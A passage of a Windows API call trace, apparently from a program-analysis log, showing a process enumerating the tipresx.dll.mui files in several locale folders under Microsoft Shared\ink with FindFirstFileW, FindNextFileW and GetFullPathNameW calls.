cAlternateFileName="")) returned 1 [0046.437] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.438] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.438] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.438] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", lpFilePart=0x0) returned 0x38 [0046.438] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\", lpFilePart=0x0) returned 0x39 [0046.438] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.438] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.438] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4fe5f52, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe52213c5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5247522, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.438] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4fe5f52, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe52213c5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5247522, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.439] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.439] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", lpFilePart=0x0) returned 0x38 [0046.439] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.439] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.439] CoTaskMemFree (pv=0x4fe370) [0046.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.439] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", lpFilePart=0x0) returned 0x38 [0046.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.439] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", lpFilePart=0x0) returned 0x38 [0046.439] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\", lpFilePart=0x0) returned 0x39 [0046.439] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe42361e6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe44977b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe44977b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.472] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.472] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.472] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", lpFilePart=0x0) returned 0x38 [0046.472] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\", lpFilePart=0x0) returned 0x39 [0046.472] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe42361e6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe44977b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe44977b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe42361e6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe44977b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe44977b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.473] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.473] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", lpFilePart=0x0) returned 0x38 [0046.473] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.473] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.473] CoTaskMemFree (pv=0x4fe370) [0046.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", lpFilePart=0x0) returned 0x38 [0046.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", lpFilePart=0x0) returned 0x38 [0046.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\", lpFilePart=0x0) returned 0x39 [0046.474] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe59917ef, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5b809a8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5b809a8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.475] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", lpFilePart=0x0) returned 0x38 [0046.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\", lpFilePart=0x0) returned 0x39 [0046.475] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe59917ef, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5b809a8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5b809a8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe59917ef, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5b809a8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5b809a8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.476] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.476] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", lpFilePart=0x0) returned 0x38 [0046.476] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.476] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.476] CoTaskMemFree (pv=0x4fe370) [0046.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.476] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", lpFilePart=0x0) returned 0x38 [0046.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.476] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", lpFilePart=0x0) returned 0x38 [0046.477] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\", lpFilePart=0x0) returned 0x39 [0046.477] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4bbb926, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4dd0c3c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4dd0c3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.477] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", lpFilePart=0x0) returned 0x38 [0046.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\", lpFilePart=0x0) returned 0x39 [0046.478] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4bbb926, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4dd0c3c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4dd0c3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, 